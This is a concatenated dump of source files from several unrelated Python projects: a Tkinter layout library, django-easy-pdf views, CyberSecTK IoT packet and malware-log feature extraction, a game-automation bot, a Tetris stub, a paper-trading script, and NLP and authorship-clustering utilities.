attr2sub=attr2sub, mode=mode) def compile_ast(tree: ast.AST, path_mapping={}, allowed_names=[], attr2sub=False, mode="eval"): #allowed_names += ["_r", "_s"] # Security Check security_check_ast(tree, allowed_internal_names=allowed_names) reslv_abs_mod = ResolveAbsolutePath(name_mapping=path_mapping, no_name_replace=attr2sub, reserved_names=allowed_names) attr2sub_mod = Attribute2Subscribe() tree = reslv_abs_mod.visit(tree) tree = attr2sub_mod.visit(tree) if mode == "eval": expr = ast.Expression(body=tree) elif mode == "exec": tree.ctx = ast.Store() expr = ast.Module(body=[ ast.Assign( targets=[tree], value =ast.Name( id='_value', ctx=ast.Load()) ) ], type_ignores=[]) expr = ast.fix_missing_locations(expr) return compile(expr, filename="<ast>", mode=mode) def eval_compiled(comp, variables={}): try: return eval(comp, {"__builtins__":None}, dict(copy(safe_dict), **variables)) except: return None def set_state(comp, variables, value): exec(comp, {"__builtins__":None, "_value": value}, variables) class ResolveAbsolutePath(ast.NodeTransformer): def __init__(self, name_mapping=None, reserved_names=[], no_name_replace=False): super().__init__() self._no_name_replace = no_name_replace self._name_mapping = name_mapping self._ignore_built_in = safe_list + reserved_names def visit_Name(self, node: ast.Name): if node.id in self._ignore_built_in or self._no_name_replace: return self.generic_visit(node) if self._name_mapping and node.id in self._name_mapping: return self.generic_visit(self._name_mapping[node.id]) return self.generic_visit(node) class Attribute2Subscribe(ast.NodeTransformer): def visit_Attribute(self, node: ast.Attribute): attr = ast.Str(s=node.attr) index = ast.copy_location(ast.Index( value=ast.copy_location(attr, node) ), node) return self.generic_visit(ast.copy_location( ast.Subscript( value = node.value, ctx= ast.Load(), slice=index ),node)) ``` #### File: layoutx/widgets/logger.py ```python from .widget import Widget import tkinter as tk from tkinter import ttk, END from tkinter.scrolledtext import ScrolledText import logging import re class Logger(Widget): class LoggingFilter(logging.Filter): def filter(self, record): return record.level == self._level and re.match(self._regex_filter, record.message) class Handler(logging.Handler): def __init__(self, widget): logging.Handler.__init__(self) self.setFormatter(logging.Formatter("%(asctime)s: %(message)s")) self._tk = widget self._tk.config(state='disabled') def emit(self, record): self._tk.config(state='normal') if record.msg.startswith("INIT"): self._tk.insert(END, self.format(record) + "\n", "init") elif record.msg.startswith("DISPOSE"): self._tk.insert(END, self.format(record) + "\n", "dispose") else: self._tk.insert(END, self.format(record) + "\n") self._tk.see(END) self._tk.config(state='disabled') def __init__(self, **kwargs): self._tk = ScrolledText(master=kwargs.get("master").container) Widget.__init__(self, **kwargs) self.logging_handler = Logger.Handler(self._tk) self._logger.addHandler(self.logging_handler) self._level = self.get_attr("level", "DEBUG") self._regex_filter = self.get_attr("filter", ".*") def on_changed_level(self, value): self._level = value self._setFilters() def on_changed_filter(self, value): self._regex_filter = value self._setFilters() def clear(self): self._tk.delete("1.0", tk.END) def _setFilters(self): for log_filter in self.logging_handler.filters: self.logging_handler.removeFilter(log_filter) self.logging_handler.addFilter(LoggingFilter) def dispose(self): self._logger.removeHandler(self.logging_handler) super().dispose() ``` #### File: layoutx/widgets/progressbar.py ```python from .widget import Widget from tkinter import ttk, IntVar class ProgressBar(Widget): def __init__(self, master, **kwargs): self._value = IntVar() super().__init__(tk=ttk.Progressbar( master=master, variable=self._value ), **kwargs) self.connect_to_prop("value", self.on_changed_value) def on_changed_value(self, value): self._value.set(int(value)) def on_disposed(self): self._value = None ``` #### File: layoutx/widgets/spinbox.py ```python from .widget import Widget from tkinter import ttk, StringVar class SpinBox(Widget): def __init__(self, master, **kwargs): self._textv = StringVar() super().__init__( tk=ttk.Spinbox(master, textvariable=self._textv), **kwargs ) self._setter = self.connect_to_prop("value", self.on_changed_value) self._trace = self._textv.trace_add("write", lambda *_: self._setter(self._textv.get()) ) def on_changed_value(self, value): if value: self._textv.set(value) def on_disposed(self): self._textv.trace_remove("write", self._trace) self._setter = None ``` #### File: LayoutX/tests/test_parser.py ```python import unittest from layoutx._parser import parse_pug_to_obj, XMLElement class TestParser(unittest.TestCase): def test_simple(self): template = \ """ Button Hello world """ parsed = parse_pug_to_obj(template) assert issubclass(parsed.__class__, XMLElement) assert parsed.tag == "Button" assert parsed.text == "Hello world" def test_children(self): template = \ """ Parent Child 1 Child 2 """ parsed = parse_pug_to_obj(template) assert parsed.tag == "Parent" assert parsed.count_children == 2 assert parsed.children[0].text == '1' assert parsed.children[1].text == '2' def test_attr(self): template = \ """ Parent Child(string="attr_a" int=123 obj={'key': 'value'} bool=False) """ parsed = parse_pug_to_obj(template) assert parsed.tag == "Parent" child = parsed.children[0] assert child.tag == "Child" assert child.get_attribute("none", None) == None assert child.get_attribute("string") == "attr_a" assert child.get_attribute("int") == 123 assert child.get_attribute("obj") == {'key': 'value'} assert child.get_attribute("bool") == False if __name__ == '__main__': unittest.main() ```
{ "source": "8otco/haystack", "score": 2 }
#### File: haystack/test/test_modeling_prediction_head.py ```python import logging from haystack.modeling.model.adaptive_model import AdaptiveModel from haystack.modeling.model.language_model import LanguageModel from haystack.modeling.model.prediction_head import QuestionAnsweringHead from haystack.modeling.utils import set_all_seeds, initialize_device_settings def test_prediction_head_load_save(tmp_path, caplog=None): if caplog: caplog.set_level(logging.CRITICAL) set_all_seeds(seed=42) device, n_gpu = initialize_device_settings(use_cuda=False) lang_model = "bert-base-german-cased" language_model = LanguageModel.load(lang_model) prediction_head = QuestionAnsweringHead() model = AdaptiveModel( language_model=language_model, prediction_heads=[prediction_head], embeds_dropout_prob=0.1, lm_output_types=["per_sequence"], device=device) model.save(tmp_path) model_loaded = AdaptiveModel.load(tmp_path, device='cpu') assert model_loaded is not None ```
{ "source": "8percent/django-easy-pdf", "score": 2 }
#### File: django-easy-pdf/easy_pdf/views.py ```python from __future__ import absolute_import, division, print_function, unicode_literals try: # noinspection PyUnresolvedReferences from typing import Any, Dict, Optional, Text, Type except ImportError: pass from django.http import HttpResponse, HttpRequest from django.views.generic.base import ContextMixin, TemplateResponseMixin, View from .rendering import render_to_pdf_response, CONTENT_TYPE class PDFTemplateResponseMixin(TemplateResponseMixin): """ A mixin class that implements PDF rendering and Django response construction. """ #: Optional name of the PDF file for download. Leave blank for display in browser. download_filename = None # type: Optional[Text] #: Base URL for referencing relative images, fonts and stylesheet resources. base_url = None # type: Optional[Text] #: Response class. Defaults to :class:`django.http.HttpResponse`. response_class = HttpResponse # type: Type[HttpResponse] #: Response content type. Default is ``'application/pdf'``. content_type = CONTENT_TYPE # type: Text def get_download_filename(self): # type: () -> Optional[Text] """ Returns :attr:`download_filename` value by default. If left blank the browser will display the PDF inline. Otherwise it will pop up the "Save as.." dialog. :rtype: :class:`str` or None """ return self.download_filename def get_base_url(self): # type: () -> Optional[Text] """ Returns :attr:`base_url` value by default. :rtype: :class:`str` or None """ return self.base_url def get_render_kwargs(self): # type: () -> Dict[Text, Any] """ The render kwargs are passed to :func:`~easy_pdf.rendering.html_to_pdf`. """ return { 'download_filename': self.get_download_filename(), 'base_url': self.get_base_url() } def get_pdf_response(self, context): # type: (Dict) -> HttpResponse """ Renders PDF document and prepares response. :returns: Django HTTP response :rtype: :class:`django.http.HttpResponse` """ return render_to_pdf_response( request=self.request, template=self.get_template_names(), context=context, using=self.template_engine, response_class=self.response_class, content_type=self.content_type, **self.get_render_kwargs() ) def render_to_response(self, context, **response_kwargs): # type: (Dict, Any) -> HttpResponse # response_kwargs.setdefault('content_type', self.content_type) return self.get_pdf_response(context) class PDFTemplateView(PDFTemplateResponseMixin, ContextMixin, View): """ A view that renders template to PDF document in a way similar to Django's :class:`~django.views.generic.base.TemplateView` .. code-block:: python class HelloPDFView(PDFTemplateView): template_name = "hello.html" """ def get(self, request, *args, **kwargs): # type: (HttpRequest, Any, Any) -> HttpResponse """ Handles GET request and returns HTTP response. """ context = self.get_context_data(**kwargs) return self.render_to_response(context) ```
{ "source": "8pod/CyberSecTK-Library", "score": 2 }
#### File: cybersectk/cybersectk/utilities.py ```python import os import glob import pandas as pd from scapy.all import * from sklearn.feature_extraction.text import CountVectorizer ################################################### #################### WLAN IOT ##################### f = open ("IOTwireless.csv", "w") f.writelines("version,Pad,Len,Rate,ChannelFrequency,ChannelFlags,dBm_AntSignal,Antenna,subtype,\ type,proto,FCfield,ID,addr1,addr2,addr3,SC,addr4,Dot11Elt1.ID,Dot11Elt1.len,Dot11Elt1.info\n") def wiot(frame): if frame.haslayer(Dot11): for packets in frame: f.writelines('%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,'%(frame.version,frame.pad,frame.len,\ frame.Rate,frame.ChannelFrequency,frame.ChannelFlags,frame.dBm_AntSignal,frame.Antenna,\ frame.subtype,frame.type,frame.proto,frame.FCfield,frame.ID,frame.addr1,frame.addr2,frame.addr3,frame.SC,frame.addr4)) if packets.haslayer(Dot11Elt): packets=Dot11Elt() f.writelines('%s,%s,%s,'%(frame.payload.ID,frame.payload.len,frame.info.decode())) f.writelines('\n') sniff(offline=input("Enter the Pcap file:"), prn=wiot) ####################################################### #################### TCP IOT ########################## ip_filter = {} # python dictionary ip_filter['TCP_Mobile'] = "'tcp && (ip.src==192.168.1.45)'" ip_filter['TCP_Outlet'] = "'tcp && (ip.src==192.168.1.222) || \ (ip.src==192.168.1.67)'" ip_filter['TCP_Assistant'] = "'tcp && (ip.src==192.168.1.111) || \ (ip.src==192.168.1.30) || (ip.src==192.168.1.42) \ || (ip.src==192.168.1.59) || (ip.src==192.168.1.70)'" ip_filter['TCP_Camera'] = "'tcp && (ip.src==192.168.1.128) || \ (ip.src==192.168.1.145) || (ip.src==192.168.1.78)'" ip_filter['TCP_Miscellaneous'] = "'tcp && (ip.src==192.168.1.216) \ || (ip.src==192.168.1.46) || (ip.src==192.168.1.84) \ || (ip.src==192.168.1.91)'" ############################################################# labelFeature = open("label_feature_IOT.csv",'a') #vector space labelFeature.writelines("Label,IPLength,IPHeaderLength,TTL,\ Protocol,SourcePort,DestPort,SequenceNumber,AckNumber\ ,WindowSize,TCPHeaderLength,TCPLength,TCPStream\ ,TCPUrgentPointer,IPFlags,IPID,IPchecksum,TCPflags,TCPChecksum\n") ################################################################# def iot (**ip_filter): for original in glob.glob('original_pcap/*.pcap'): for k in ip_filter.keys(): os.system("tshark -r " + original + " -w- -Y " + ip_filter[k] + ">> filtered_pcap/" + k + ".pcap") ################################################################# for filteredFile in glob.glob('filtered_pcap/*.pcap'): #print(filteredFile) filename = filteredFile.split('/')[-1] label = filename.replace('.pcap', '') tsharkCommand = "tshark -r " + filteredFile + " -T fields \ -e ip.len -e ip.hdr_len -e ip.ttl \ -e ip.proto -e tcp.srcport -e tcp.dstport -e tcp.seq \ -e tcp.ack -e tcp.window_size_value -e tcp.hdr_len -e tcp.len \ -e tcp.stream -e tcp.urgent_pointer \ -e ip.flags -e ip.id -e ip.checksum -e tcp.flags -e tcp.checksum" allFeatures = str( os.popen(tsharkCommand).read() ) allFeatures = allFeatures.replace('\t',',') allFeaturesList = allFeatures.splitlines() for features in allFeaturesList: labelFeature.writelines(label + "," + features + "\n") ############################################################### ######################## Malware ############################## path='log_files' ######################################## labels = [] text = [] ######################################### #Path = ('log_files') for filename in os.listdir(path): if "Good" in filename: labels.append("1") else: labels.append("-1") filename = os.path.join(path, filename) print(filename) with open(filename, encoding="utf-8") as f: content = f.read() content.replace(",", " ") content.replace('"', " ") text.append(content) ## convert file contents into a sentence ########################################### vectorizer = CountVectorizer(stop_words='english', max_features=1000) ############################################ dtm = vectorizer.fit_transform(text) df = pd.DataFrame(dtm.toarray(), index=labels, \ columns=vectorizer.get_feature_names()) df.index.name = "labels" df.to_csv(r'DynamicMalwareMatrix.csv') ################################################# def malware(): features_list = vectorizer.get_feature_names() for feature in features_list: print (str(feature)) ################################################# ```
{ "source": "8-prime/magnetem_bot", "score": 3 }
#### File: 8-prime/magnetem_bot/beating_elke.py ```python from datetime import datetime import pyautogui from pynput import keyboard import sys #center button to switch sides 1280,1220 #left button 1080, 1220 #right button 1480 left = (1080,1220) center = (1280,1220) right = (1480,1220) #state 0 blue left red right state = 0 #left first bound l1 = 2049000 #left second bound l2 =2049200 #right first bound r1 = 2049380 #right second bound r2 = 2049560 #height for pixels in the middle #left end of the screen #1000 and right 1560 # left end of left 1200 # right end of right 1360 def on_press(key): sys.exit() def on_release(key): sys.exit() def set_state_and_color(px_list, state, time): time = datetime.now() #col left red 1 blue 0 c_left = -1 #col left red 1 blue 0 c_right = -1 #check color left for i in range(l1,l2): if px_list[i][0] > 200 and px_list[i][2] < 200: #left is red c_left = 1 elif px_list[i][0] < 200 and px_list[i][2] > 200: #left is blue c_left = 0 #check for color on right and left for i in range(r1,r2): if px_list[i][0] > 200 and px_list[i][2] < 200: #right is red c_right = 1 elif px_list[i][0] < 200 and px_list[i][2] > 200: #righ is blue c_right = 0 if c_left == -1 and c_right == 0: pyautogui.moveTo(left) if c_left == -1 and c_right == 1: pyautogui.moveTo(right) if c_left == 0 and c_right == -1: pyautogui.moveTo(left) if c_left == 1 and c_right == -1: pyautogui.moveTo(right) if c_left == c_right and c_left == 0: #mouse to left pyautogui.moveTo(left) if c_left == c_right and c_left == 1: #moues to right pyautogui.moveTo(right) if c_left == 0 and c_right == 1: if state == 1: pyautogui.mouseUp() pyautogui.click(center) pyautogui.moveRel(0,-300) state = 0 if c_right == 0 and c_left == 1: if state == 0: pyautogui.mouseUp() pyautogui.click(center) pyautogui.moveRel(0,-300) state = 1 start = datetime.now().timestamp() * 1000 #keylistener listener = keyboard.Listener( on_press=on_press, on_release=on_release) listener.start() while(True): if((datetime.now().timestamp() * 1000) - start > 5): image = pyautogui.screenshot() pixel_val = list(image.getdata()) set_state_and_color(pixel_val,state,start) pyautogui.mouseDown() #keep mouse pressed ```
{ "source": "8-prime/tetris_ml", "score": 3 }
#### File: tetris_ml/tetris/tetris.py ```python import pygame, sys from enum import Enum from pygame.locals import * pygame.init() #colors needed for the blocks RED = (255,0,0) BLUE = (0,0,255) ORANGE = (255,165,0) PINK = (255,192,203) CYAN = (0,255,255) GREEN = (0,255,0) YELLOW = (255,255,0) BACKGROUND = (0,0,0) #the size of each individual square on the board in pixels blocksize = 20 #the board for the blöcks board = [[RED,BLUE,ORANGE,PINK,CYAN,GREEN,YELLOW,RED,BLUE,ORANGE] for _ in range(40)] def draw_board(screen): for y in range(40): for x in range(10): pygame.draw.rect(screen,board[y][x],(x*blocksize,y*blocksize,blocksize,blocksize)) FPS = 30 FramePerSec = pygame.time.Clock() (width,height) = (200,800) DISPLAYSURF = pygame.display.set_mode((width,height)) DISPLAYSURF.fill(BACKGROUND) pygame.display.set_caption('Tetris') while True: draw_board(DISPLAYSURF) pygame.display.update() for event in pygame.event.get(): if event.type == QUIT: pygame.quit() sys.exit() FramePerSec.tick(FPS) class Pice: def __init__ (self, shape, color, x, y): self.c = color self.s = shape self.x = x self.y = y #class Board: ```
{ "source": "8-prime/trading-bot", "score": 3 }
#### File: 8-prime/trading-bot/trade_gen_two.py ```python import json import time from datetime import datetime from scrape import get_daily_top_n from alpha_vantage.timeseries import TimeSeries ''' Global variables needed for operation ''' key = '' fd = './keyfile' with open(fd, 'r') as file: key = file.readlines() print(key) ts = TimeSeries(key=key[0], output_format='pandas', indexing_type='integer') CURRENT_PRICE_INDEX = '1. open' SLEEP_DURATION = 900 stocks_of_interest = {} data = {} data['Money'] = 1000 ''' Because the script is only supposed to do things when the stock market is open the opening and closing times have to be saved ''' opening_time = datetime.now().replace(hour=8, minute=0, second=0, microsecond=0) closing_time = datetime.now().replace(hour=20, minute=0, second=0, microsecond=0) ''' Structure for the data dictionary: a Stock has its name as the key and has a dict as the value with the following fields 'name' : { 'price_time_of_purchace' 'sliding_average' 'amount_held' 'current_price' } The stocks of interes dictionary hold the name of stocks that are currently interesing to the user as well as the price so that it can be immediately used when the stock is to be bought 'name' : { 'current_price' } ''' def list_compare(a,b): sa = sorted(a) sb = sorted(b) if (len(sa) != len(sb)): return False for i in range (len(sa)): if sa[i] != sb[i]: return False return True def persist(): print('Writing data to file') with open('data.json', 'w') as file: json.dump(data,file,indent=4) def test_for_buying(): print('Looking at potential stocks to buy') if data['Money'] > 0: names_interested = list(stocks_of_interest.keys()) for name in names_interested: if data['Money'] > stocks_of_interest[name]['current_price']: print('Buying ' + name + ' for: ' + str(stocks_of_interest[name]['current_price']) + '$') data['Money'] -= stocks_of_interest[name]['current_price'] if not name in list(data.keys()): data[name] = {} data[name]['amount_held'] = 1 else: data[name]['amount_held'] += 1 data[name]['current_price'] = stocks_of_interest[name]['current_price'] data[name]['sliding_average'] = stocks_of_interest[name]['current_price'] #when checking for stocks to sell iterato trough the list of keys, #exlude 'Money' and then check of the condition to sell is met def test_for_selling(): stock_list = list(data.keys()) stock_list.remove('Money') print('Testing for sellable stocks') for stock in stock_list: if data[stock]['current_price'] < data[stock]['price_top']: print('Selling ' + stock) data['Money'] += data[stock]['current_price'] * data[stock]['amount_held'] del data[stock] #update data for the stocks of interest def update_interested(): print('Updating stocks of interest') names_interested = list(stocks_of_interest.keys()) for name in names_interested: while True: try: updated_price = ts.get_intraday(name) stocks_of_interest[name]['current_price'] = updated_price[0][CURRENT_PRICE_INDEX][0] print('Updated potential stock ' + name) return except Exception: pass #update data for the owned stocks def update_held_stocks(): names_held_stocks = list(data.keys()) names_held_stocks.remove('Money') print('Updating held stocks') for name in names_held_stocks: while True: try: updated_price = ts.get_intraday(name) data[name]['sliding_average'] = (data[name]['sliding_average'] + updated_price[0][CURRENT_PRICE_INDEX][0]) / 2 data[name]['current_price'] = updated_price[0][CURRENT_PRICE_INDEX][0] print('Updated held stock ' + name) return except Exception: pass def populate_of_interest(): names_of_interest = get_daily_top_n(5) print('Top five retreived') global stocks_of_interest # if the list has changed it will be replaced by the new top n if not stocks_of_interest or not list_compare(names_of_interest, list(stocks_of_interest.keys())): print('New stocks found') stocks_of_interest = {} for name in names_of_interest: while True: try: print('Trying to retreive data for ' + name) current_price_history = ts.get_intraday(name) stocks_of_interest[name] = { 'current_price' : current_price_history[0][CURRENT_PRICE_INDEX][0] } break except ValueError: # catches the case that the name from the daily top n is not available trough alpha vantage break except Exception: # Catches the exception thrown when the max api calls were used pass while True: #if True:#opening_time > datetime.now() and datetime.now() < closing_time: #stockmarket is open baby populate_of_interest() update_held_stocks() update_interested() test_for_selling() test_for_buying() persist() time.sleep(SLEEP_DURATION) ```
{ "source": "8sukanya8/koppel_pseudodepigraphia", "score": 3 }
#### File: koppel_pseudodepigraphia/koppel_pseudodepigraphia/imposter.py ```python import preprocess_NLP_pkg import koppel_pseudodepigraphia.config import re import os def create_imposters_from_author_dict(dictionary, token_path): for author in dictionary.keys(): list_of_books = dictionary[author] create_imposters(author, list_of_books, token_path) def create_imposters(author, list_of_books, token_path): for book in list_of_books: book_text = preprocess_NLP_pkg.read_file(token_path + "/"+ book, 'rb') book_sub_texts = split_n_parts(book_text, koppel_pseudodepigraphia.config.imposter_sub_text_size) # sub text list n_sub_texts = len(book_sub_texts) # number of sub texts for j in range(0,n_sub_texts): book_name = re.sub(".txt","",book) sub_text_name = author + "_" + book_name + "_" + str(j)+ ".txt" print(sub_text_name) preprocess_NLP_pkg.write_file(koppel_pseudodepigraphia.config.imposters_folder_path + "/" + sub_text_name, book_sub_texts[j], mode='wb') def load_imposters(imposters_path): files_in_path = os.listdir(imposters_path) imposters_docs_names = list(file for file in files_in_path if re.search(".txt", file)) return imposters_docs_names def split_n_parts(text, n = 2): """ Splits a given text into a list of sub texts of size n each Keyword arguments: text -- the text to be split n -- size of sub-text """ if n > text.__len__(): print("Error! Sub text size is greater than text!") return else: text_parts_list = [text[i:i + n] for i in range(0, len(text), n)] return text_parts_list[:-1] # removing last element as it might have size less than n ```
{ "source": "8sukanya8/preprocess_NLP_pkg", "score": 4 }
#### File: preprocess_NLP_pkg/preprocess_NLP_pkg/text_processing.py ```python import re, unicodedata import inflect from nltk.stem import LancasterStemmer, WordNetLemmatizer def tokenize(character_seq, delimiter, remove_chars = None): """Removes given characters from a character sequence and splits according to the given delimiter Keyword arguments: character_seq -- character sequence to be split delimiter -- to split the character sequence remove_chars = the characters to remove """ if remove_chars.len is not None: for i in remove_chars: re.sub(i, "", character_seq) tokens = character_seq.split(delimiter) return tokens def paragraph_tokenizer(text, delimiter = '\n\n'): """Given a text, break it down into paragraphs Keyword arguments: text -- given text delimiter - type of delimiter to be used, default value is '\n\n' """ paragraphs = text.split(delimiter) return paragraphs def remove_non_ascii(word_list): """Remove non-ASCII characters from list of tokenized word_list Keyword arguments: word_list: list of words """ new_word_list = [] for word in word_list: new_word = unicodedata.normalize('NFKD', word).encode('ascii', 'ignore').decode('utf-8', 'ignore') new_word_list.append(new_word) return new_word_list def to_lowercase(word_list): """Convert all characters to lowercase from list of tokenized word_list Keyword arguments: word_list: list of words """ lowercase_word_list = [word.lower() for word in word_list] return lowercase_word_list def remove_punctuation(word_list): """Remove punctuation from list of tokenized word_list Keyword arguments: word_list: list of words """ new_word_list = [] #[re.sub(r'[^\w\s]', '', word) for word in word_list if re.sub(r'[^\w\s]', '', word) != ''] for word in word_list: new_word = re.sub(r'[^\w\s]', '', word) if new_word != '': new_word_list.append(new_word) return new_word_list def replace_numbers(word_list): """Replace all interger occurrences in list of tokenized word_list with textual representation Keyword arguments: word_list: list of words """ p = inflect.engine() new_word_list = [] for word in word_list: if word.isdigit(): new_word = p.number_to_word_list(word) new_word_list.append(new_word) else: new_word_list.append(word) return new_word_list ''' def remove_stopword_list(word_list): """Remove stop word_list from list of tokenized word_list""" new_word_list = [] for word in word_list: if word not in stopword_list.word_list('english'): new_word_list.append(word) return new_word_list ''' def stem_word_list(word_list): """Stem word_list in list of tokenized word_list Keyword arguments: word_list: list of words """ stemmer = LancasterStemmer() stems = [] for word in word_list: stem = stemmer.stem(word) stems.append(stem) return stems def lemmatize_verbs(word_list): """Lemmatize verbs in list of tokenized word_list Keyword arguments: word_list: list of words """ lemmatizer = WordNetLemmatizer() return [lemmatizer.lemmatize(word, pos='v') for word in word_list] def process_word_list(word_list): """Process the word list with different techniques such as non ascii removal, conversion to lowercase, removing punctuation etc. Keyword arguments: word_list: list of words """ word_list = remove_non_ascii(word_list) word_list = to_lowercase(word_list) word_list = remove_punctuation(word_list) word_list = replace_numbers(word_list) #word_list = remove_stopword_list(word_list) return word_list def window_tokenizer(text, window_size = 5000, step_size = 100): """Given a text, break it down into windows of mentioned size, skipping characters mentioned in step size Keyword arguments: text -- given text window_size - number of characters in a window step_size - number of characters to skip before beginning next windows """ windows = [] i = 0 while i < (len(text)-window_size + step_size): window = text[i:i + window_size] windows.append(window) i = i + step_size return windows ```
{ "source": "8sukanya8/SCD_CLEF_2019", "score": 3 }
#### File: algorithms/window_merge_clustering/executor.py ```python from src.algorithms.window_merge_clustering.feature_selection import calculate_window_distance_with_selected_words import re import preprocess_NLP_pkg from statistics import mean, stdev from src.algorithms.preprocessing import paragraph_tokenizer from src.algorithms.window_merge_clustering.ClusterCollection import ClusterCollection from src.algorithms.window_merge_clustering.Cluster import Cluster import numpy as np from src.algorithms.threshold_clustering.executor import is_duplicated def update_cluster_label(windows, selected_words): """ Calculates distance matrix, finds the windows which have the most similarity, merges the labels of those windows and returns the updated cluster labels :param windows: list of windows (text) :param selected_words: list of selected word features :return: updated cluster labels """ labels = ['w'+str(i) for i in range(0,len(windows))] cluster_labels = [] while len(windows)>1: result = calculate_window_distance_with_selected_words(windows, preprocess_NLP_pkg.symmetric_kullback_leibler_divergence, selected_words) flat = np.array([val for val in result.flatten() if val>0]) min = flat.min() w1, w2 = np.where(result == min) #print(labels[w1[0]], labels[w2[0]], min) cluster_labels.append((labels[w1[0]], labels[w2[0]], min)) windows, labels = merge_windows(w1[0],w2[0], windows, labels) return cluster_labels def generate_clusters(cluster_labels): """ Accepts cluster labels in the format [("w0w1", "w3", dist)]. For each label, identifies how many windows are present in position 1 and 2. -If both positions contain 1 window each, a new cluster is created with these two as members -If one position contains 1 window and the other more than one windows, then the case is treated as adding a member to a cluster -If both positions contain more than one windows, then the case is treated as merging two clusters. :param cluster_labels: labels of the clusters. For example, label (w1w2) means a cluster with members window 1 and window2 :return: a ClusterCollection object """ cluster_list_obj = ClusterCollection() for label in cluster_labels: windows_pos_1 = list(set(re.findall('w\d*', label[0]))) windows_pos_2 = list(set(re.findall('w\d*', label[1]))) dist = label[2] if len(windows_pos_1) ==1 and len(windows_pos_2)>1: # treat as adding a member to a cluster member = windows_pos_1[0] existing_cluster = cluster_list_obj.find_cluster_with_members(windows_pos_2) if existing_cluster is not None: new_cluster = Cluster(member1=member, distance = dist, cluster1 = existing_cluster) cluster_list_obj.add_cluster(new_cluster) else: print("Error! No cluster found containing members", windows_pos_2, "\n Skipping entry", windows_pos_1, windows_pos_2) elif len(windows_pos_2) ==1 and len(windows_pos_1)>1: # treat as adding a member to a cluster member = windows_pos_2[0] existing_cluster = cluster_list_obj.find_cluster_with_members(windows_pos_1) if existing_cluster is not None: new_cluster = Cluster(member1=member, distance=dist, cluster1=existing_cluster) cluster_list_obj.add_cluster(new_cluster) else: print("Error! No cluster found containing members", windows_pos_2, "\n Skipping entry", windows_pos_2, windows_pos_1) elif len(windows_pos_1)==1 and len(windows_pos_2)==1: # treat as creating a cluster with two members member1 = windows_pos_1[0] member2 = windows_pos_2[0] new_cluster = Cluster(member1=member1, distance=dist, member2= member2) cluster_list_obj.add_cluster(new_cluster) elif len(windows_pos_1)>1 and len(windows_pos_2)>1: # treat as merging two clusters together existing_cluster_1 = cluster_list_obj.find_cluster_with_members(windows_pos_1) existing_cluster_2 = cluster_list_obj.find_cluster_with_members(windows_pos_2) if existing_cluster_1 is not None and existing_cluster_2 is not None: new_cluster = Cluster(distance=dist, cluster1=existing_cluster_1, cluster2 = existing_cluster_2) cluster_list_obj.add_cluster(new_cluster) #cluster_list_obj.print() #cluster_list_obj.print() return cluster_list_obj def merge_windows(w1_index,w2_index, windows, cluster_labels): """ Merges the two given windows and returns updated merged windows and corresponding labels :param w1_index: window 1 index :param w2_index: window 2 index :param windows: list of windows (text) :param cluster_labels: labels of the clusters. For example, label (w1w2) means a cluster with members window 1 and window2 :return: new merged windows and new labels """ #print(w1,w2,labels) new_windows = [val for index,val in enumerate(windows) if index not in [w1_index,w2_index]] selected_indices = [i for i in range(0, len(cluster_labels)) if i not in [w1_index, w2_index]] new_labels = [cluster_labels[i] for i in selected_indices] new_windows.append(windows[w1_index] + windows[w2_index]) new_labels.append(cluster_labels[w1_index]+cluster_labels[w2_index]) #print(new_labels) return (new_windows, new_labels) def get_number_of_authors(cluster_list_obj, rejected_windows, windows): """ Uses the length of the cluster_list_obj to generate a preliminary number of authors. Thereafter, the size of the rejected windows which could not be part of any cluster are evaluated. If char count of the rejected windows are found to be of significant length, then the number of authors is increased. :param cluster_list_obj: :param rejected_windows: :param windows: :return: """ # increases author number for each rejected windows size > mean windows size #print("rejected", rejected_windows) authors = len(cluster_list_obj) if rejected_windows is None: return authors labels = ['w' + str(i) for i in range(0, len(windows))] win_len_arr = np.array([len(win) for win in windows]) greater_than_threshold = 0 for i in range(0, len(windows)): if labels[i] in rejected_windows: #print(labels[i], len(windows[i]), mean(win_len_arr),stdev(win_len_arr)) if len(windows[i]) > (mean(win_len_arr) +stdev(win_len_arr)): #print("Author num bumped") greater_than_threshold = greater_than_threshold +1 authors = authors + greater_than_threshold return authors def execute_window_merge_clustering(text, use_duplication_feature= True): """ From a text, creates a distance matrix from windows. Iteratively, most similar windows are merged and distance matrix recalculated. Iteration stops when there are no more windows to merge. :param text: text for which clustering is to be determined :param use_duplication_feature: Boolean for whether to use duplication for prediction :return: number of authors """ try: if use_duplication_feature: if is_duplicated(text) < 2: number_of_authors = 1 return number_of_authors windows = paragraph_tokenizer(text, remove_url=True, remove_empty_paragraphs=True) selected_words_freq_dist = preprocess_NLP_pkg.word_freq_count(text, number_of_terms=50) selected_words = list(selected_words_freq_dist.keys()) new_cluster_labels = update_cluster_label(windows, selected_words) cluster_list_obj = generate_clusters(new_cluster_labels) trimmed_cluster_list_obj, rejected_windows = cluster_list_obj.cut_clusters_with_threshold(threshold=0.5) number_of_authors = get_number_of_authors(trimmed_cluster_list_obj, rejected_windows, windows) # len(cluster_list_obj_cut)# if number_of_authors == 0: number_of_authors = 1 except: print("Something went wrong. Appending the predicted authors with a 1") number_of_authors = 1 return number_of_authors ``` #### File: SCD_CLEF_2019/src/load_data.py ```python import os import re import fnmatch import json def load_files_from_dir(dir, pattern = None): """Given a directory, load files. If pattern is mentioned, load files with given pattern Keyword arguments: text -- given text delimiter - type of delimiter to be used, default value is '\n\n' """ files_in_path = os.listdir(dir) docs_names = [] if pattern is None: docs_names = list(file for file in files_in_path if re.search(".txt", file)) else: try: docs_names = fnmatch.filter(os.listdir(dir), pattern) except TypeError: print("Error! pattern should be a string or bytes like object. Returning None") docs_names = None return docs_names def load_txt_to_dict_vk(filepath, delimiter = ','): """Given a filepath, load the contents in the format value,key into a dictionary in the format (key:value) Keyword arguments: filepath -- path to text file delimiter - type of delimiter to be used, default value is ',' """ d = {} with open(filepath) as f: for line in f: if not line.startswith("#"): line = re.sub('\n', '',line) (val, key) = line.split(delimiter) val_list = [] if d.get(key): val_list = val_list + d.get(key) + [val] d[key] = val_list else: val_list = val_list + [val] d[key] = val_list return d def load_txt_to_dict_kv(filepath, delimiter = ','): """Given a filepath, load the contents in the format key,value into a dictionary in the format (key:value) Keyword arguments: filepath -- path to text file delimiter - type of delimiter to be used, default value is ',' """ d = {} with open(filepath) as f: for line in f: if not line.startswith("#"): line = re.sub('\n', '',line) (key, val) = line.split(delimiter) d[key] = val return d def convert_dict_values_to_list(d, separator = ' '): """Given a filepath, load the contents in the format value,key into a dictionary in the format (key:value) Keyword arguments: filepath -- path to text file delimiter 